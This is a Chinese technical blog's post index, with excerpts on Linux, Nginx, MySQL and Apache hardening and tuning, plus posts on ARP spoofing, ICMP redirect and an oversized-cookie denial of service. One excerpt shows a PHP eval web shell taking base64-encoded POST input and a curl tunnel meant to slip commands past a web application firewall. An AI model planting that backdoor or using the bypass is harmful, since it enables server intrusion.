- 博客(32)
- 收藏
- 关注
RSS订阅转载 LANMAN工作原理
背景描述 随着网络应用的不断深入,处于网络中的敏感信息被集中保存在服务器或存储设备中,甚至在网络客户端也往往保存着大量的敏感数据。为了保护这些敏感信息及相关数据不会丢失,或者被恶意用户非法访问,造成不必要的损失,网络用户往往会给这些服务器或存储设备进行Windows口令加密。但同时,随着破解密码的技术不断更新,加上用户设置密码存在一定的规律,例如使用年份、生日、名字和常用语等等作为
2017-04-07 09:50:08
5199
原创 Git中的fetch和pull
Git中从远程的分支获取最新的版本到本地有这样2个命令:1. git fetch:相当于是从远程获取最新版本到本地,不会自动merge git fetch origin mastergit log -p master..origin/mastergit merge origin/master 以上命令的含义: 首先从远程的origin的mas
2016-06-15 22:51:09
446
转载 正则表达式匹配域名、网址、url
DNS规定,域名中的标号都由英文字母和数字组成,每一个标号不超过63个字符,也不区分大小写字母。标号中除连字符(-)外不能使用其他的标点符号。级别最低的域名写在最左边,而级别最高的域名写在最右边。由多个标号组成的完整域名总共不超过255个字符。由此匹配完整域名的正则表达式: ^(?=^.{3,255}$)[a-zA-Z0-9][-a-zA-Z0-9]{0,62}(\.[a-zA
2016-01-26 13:24:47
40660
2
转载 ARP 欺骗+ICMP 重定向
不同于局域网内的 ARP 欺骗,跨网段的 ARP 欺骗一直 是技术难点。有些学者提出可用“ARP 欺骗+ICMP 重定向” 解决[4]。比如,假设网络 1 与网络 2 经一个路由器相联,在 网络 1 内的两台主机 A 和 B 正在通信,网络 2 内的攻击者实 施 ARP 欺骗。 在“ARP 欺骗+ICMP 重定向”这种观点中,攻击者可 先寻找 B 的漏洞当掉 B,然后发送给 A 虚假的 ARP
2015-06-08 11:55:47
3563
转载 ICMP重定向攻击
ICMP重定向报文是当主机采用非最优路由发送数据报时,路由器会发回ICMP重定向报文来通知主机最优路由的存在[3]。并且重定向报文必须由路由器生成,当主机作为路由器使用时,必须将其内核配置成可以发送重定向报文。ICMP重定向攻击也可以达到类似ARP欺骗的攻击效果。假设主机A(IP地址为172.16.1.2)经默认路由器(IP地址为172.16.1.1)与另一个网络中的主机D(IP地址为172.
2015-06-08 11:50:42
16097
转载 ARP欺骗
在实际网络的链路上传送数据帧时,是采用硬件地址来寻址,地址解析协议解决了从IP地址到硬件地址的映射问题[1]。比如,源主机欲向本网内的主机发送数据包时,先在源主机的ARP高速缓存中查看有无目的主机的硬件地址,如存在,就将目的主机的硬件地址写入MAC帧并发送,如不存在,源主机自动在网内广播一个ARP请求报文来获得目的主机的硬件地址。网内的所有主机都收到此ARP请求,只有目的主机才会发回一个ARP响应
2015-06-08 11:46:25
1080
原创 Apache安全配置
1 安全策略1.1 安全目录.htaccess做目录安全保护的,欲读取这保护的目录需要先键入正确用户帐号与密码。这样可做为专门管理网页存放的目录或做为会员区等。AllowOverride AllLoadModule rewrite_module modules/mod_rewrite.so在自动要认证的目录下建立. htaccess文本(windows中用记事本另存为建立)
2015-06-08 10:29:42
1088
转载 Apache服务器SSL配置
Apache服务器SSL配置Apache服务器SSL配置笔者不久前参与了某系统代理服务器配置的研究,查阅了大量关于Apache的SSL配置的资料。本文即是笔者学习这些资料后的经验总结,以Win32版Apache与OpenSSL为例,介绍从创建数字证书到Apache配置的整个过程,希望对读者有所帮助。Apache是目前最流行的WEB服务器之一,借助OpenSSL库,我们可以在Apache
2015-06-08 10:16:35
2583
原创 MySQL安全配置
MySQL_Help_Link1 安全策略1.1 管理意义上的数据安全访问 MySQL 数据库必须首先访问数据库的某个权限、即以某个权限模式用户的身份登录,大部分的安全管理主要通过模式用户的权限来实现。MySQL 的相关权限信息主要存放在 grant tables 的系统表中,即 mysql.User(全局级别权限) 、 mysql.db (数据库级别权限)、 mysql.Host
2015-06-08 10:10:52
2635
原创 加密隧道绕过WAF
一下采用base64编码使WAF无法识别接收内容从而达到目的,在必要的情况下发送也要进行编码防止WAF检测到server<?php if($_POST['c']!='') @eval(base64_decode($_POST[z0]));?>tunnel<?php$handle=curl_init();$DATA=array();$DATA=$_POST;$DATA['c']=
2015-06-07 10:57:08
660
原创 Linux安全优化
- -iptablesiptables -A INPUT -p all -m state --state INVALID -j DROPiptables -A INPUT -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROPiptables -A INPUT -p tcp --syn -m state --state NEW -m multiport --
2015-06-07 10:52:14
588
原创 Nginx 使用CloudFlare CDN加速配置
- -#CloudFlare real ipset_real_ip_from 199.27.128.0/21;set_real_ip_from 173.245.48.0/20;set_real_ip_from 103.21.244.0/22;set_real_ip_from 103.22.200.0/22;set_real_ip_from 103.31.4.0/2
2015-06-07 10:50:25
3937
原创 iptables 笔记
- -不允许接受icmp数据包到本地iptables -A INPUT -p icmp --icmp-type 8 -j DROP不允许发送未知数据包到本地iptables -A INPUT -p all -m state --state INVALID -j DROP允许已经允许过的连接和被动请求数据包发送到本地iptables -A INPUT all -m state --
2015-06-06 16:20:43
4353
转载 超大 Cookie 拒绝服务攻击
有没有想过,如果网站的 Cookie 特别多特别大,会发生什么情况?不多说,马上来试验一下:for (i = 0; i 20; i++) document.cookie = i + '=' + 'X'.repeat(2000)什么,网站居然报错了?众所周知,Cookie 是塞在请求头里的。如果 Cookie 太多,显然整个 HTTP 头也会被撑大。
2015-06-06 10:42:48
1085
转载 实验 Attacks on TCP/IP Protocols
-------转载请注明出处,博客园-lasgalen-http://www.cnblogs.com/lasgalen/p/4555648.html -------1 实验目的进行这个实验的目的是获得TCP/IP协议缺陷和基于这些缺陷的攻击的经验。在TCP/IP协议上的缺陷是一种在协议设计和实现出现的漏洞。这给我们上了很宝贵的一课,关于为什么安全应当在一开始的时候就
2015-06-06 10:41:42
1543
转载 Nginx配置性能优化
大多数的Nginx安装指南告诉你如下基础知识——通过apt-get安装,修改这里或那里的几行配置,好了,你已经有了一个Web服务器了。而且,在大多数情况下,一个常规安装的nginx对你的网站来说已经能很好地工作了。然而,如果你真的想挤压出Nginx的性能,你必须更深入一些。在本指南中,我将解释Nginx的那些设置可以微调,以优化处理大量客户端时的性能。需要注意一点,这不是一个全面的微调指南。这是一
2015-06-01 23:40:39
412
转载 linux内核参数注释与优化
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://yangrong.blog.51cto.com/6945369/1321594目录1、linux内核参数注释2、两种修改内核参数方法3、内核优化参数生产配置参数解释由网络上收集整理,常用优化参数对比了网上多个实际应
2015-06-01 23:38:25
576
转载 CentOS(5.8/6.4)linux生产环境若干优化实战
原创作品,允许转载,转载时请务必以超链接形式标明文章 原始出处 、作者信息和本声明。否则将追究法律责任。http://oldboy.blog.51cto.com/2561410/1336488特别说明:本文来自老男孩linux培训VIP学生学习笔记。特和所有博友分享。更多优化,请关注老男孩培训后续课程内容以及分享。为了满足广大博友工作需求,老男孩linux培训课程从2013年起
2015-06-01 23:27:31
606
3
转载 优化Mysql的运行环境(Linux)
转载一、修改Linux默认的IO调度算法.linux默认的IO调度算法为cfq,需要修改为dealine,如果是SSD或者PCIe-SSD设备,需要修改为noop,可以使用下面两种修改方式。1、在线动态修改,重启失效。echo “deadline” > /sys/block/sda/queue/schedulertips:这里的sda代表你需要修改的硬盘
2015-06-01 23:22:00
418
转载 linux内核优化,内核参数详解
转自百度文库,最后有一部分修改:一、前言本文档针对OOP8生产环境,具体优化策略需要根据实际情况进行调整;本文档将在以下几个方面来阐述如何针对RedHat Enterprise Linux进行性能优化。1) Linux Proc文件系统,通过对Proc文件系统进行调整,达到性能优化的目的。2) Linux性能诊断工具,介绍如何使用Linux自带的诊断工具
2015-06-01 23:19:47
6244
转载 Linux 内核优化
作者:@smallmcw声明:本文档来自互联网整理部份加自已实验部份所得:TCP 相关部份 常用名词说明:retries(再试)、 TCP 服务器 客户端通信状态 SYN----------------> ACK--------------->
2015-06-01 17:49:12
877
原创 Linux TCP优化
直接上配置vi /etc/sysctl.conf--------------start-------------# max open filesfs.file-max = 51200# max read buffernet.core.rmem_max = 67108864# max write buffernet.core.wmem_max = 67108864# defaul
2015-06-01 16:26:57
802
转载 优化Linux的内核参数来提高服务器并发处理能力
PS:在服务器硬件资源额定有限的情况下,最大的压榨服务器的性能,提高服务器的并发处理能力,是很多运维技术人员思考的问题。要提高Linux系统下的负载能力,可以使用nginx等原生并发处理能力就很强的web服务器,如果使用Apache的可以启用其Worker模式,来提高其并发处理能力。除此之外,在考虑节省成本的情况下,可以修改Linux的内核相关TCP参数,来最大的提高服务器性能。当然,最基础的提高
2015-06-01 15:20:14
591
转载 浅谈TCP优化
很多人常常对TCP优化有一种雾里看花的感觉,实际上只要理解了TCP的运行方式就能掀开它的神秘面纱。Ilya Grigorik 在「High Performance Browser Networking」中做了很多细致的描述,让人读起来醍醐灌顶,我大概总结了一下,以期更加通俗易懂。 流量控制 传输数据的时候,如果发送方传输的数据量超过了接收方的处理能力,那么接收方会出现丢包。
2015-06-01 13:24:34
687
原创 PHP防御防御永久型和反射XSS
本代码只用于防御永久型和反射型XSS 攻击,有更好的意见请留言,thank you !!<?phpclass Safe { function basic($c) { $ord = ord($c); if($this->isnumber($ord)) { if(mb_check_encoding($c,"UTF-8")) { return $c; }
2015-06-01 11:44:29
593
转载 Linux中TCP连接过程状态简介
一、Linux服务器上11种网络连接状态:图:TCP的状态机通常情况下,一个正常的TCP连接,都会有三个阶段:1、TCP三次握手; 2、数据传送; 3、TCP四次挥手注:以下说明最好能结合”图:TCP的状态机”来理解。SYN: (同步序列编号,Synchronize Sequence Numbers)该标志仅在三次握手建立TCP连接时有效。表示一
2015-06-01 11:21:03
830
转载 高流量站点NGINX与PHP-fpm配置优化
By youngsterxyf原文:Optimizing NGINX and PHP-fpm for high traffic sites译者:youngsterxyf使用Nginx搭配PHP已有7年的这份经历让我们学会如何为高流量站点优化NGINX和PHP-fpm配置。以下正是这方面的一些提示和建议:1. 将TCP切换为UNIX域套接字UN
2015-05-31 23:06:06
487
转载 nginx优化 突破十万并发
一、一般来说nginx 配置文件中对优化比较有作用的为以下几项:1. worker_processes 8;nginx 进程数,建议按照cpu 数目来指定,一般为它的倍数 (如,2个四核的cpu计为8)。2. worker_cpu_affinity 00000001 00000010 00000100 00001000 00010000 00100000 01000000
2015-05-31 22:50:41
476
原创 代理服务器安全配置
groupadd ssuseruseradd ssuser -g ssuseriptables -t nat -A PREROUTING -d 133.130.48.86/32 -p tcp -m tcp --dport 110 -j DNAT --to-destination 133.130.48.86:11000iptables -t nat -A PREROUTING -d 133.1
2015-05-31 22:13:50
850
原创 Ubuntu 14.04 LNMP源码编译环境搭建 Nginx-1.9.1 PHP-5.6.9 Mariadb-10.0.19 完整教程
Ubuntu源码LNMP编译教程教程导航1.源码下载2.源码编译3.环境配置
2015-05-31 11:07:52
972
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人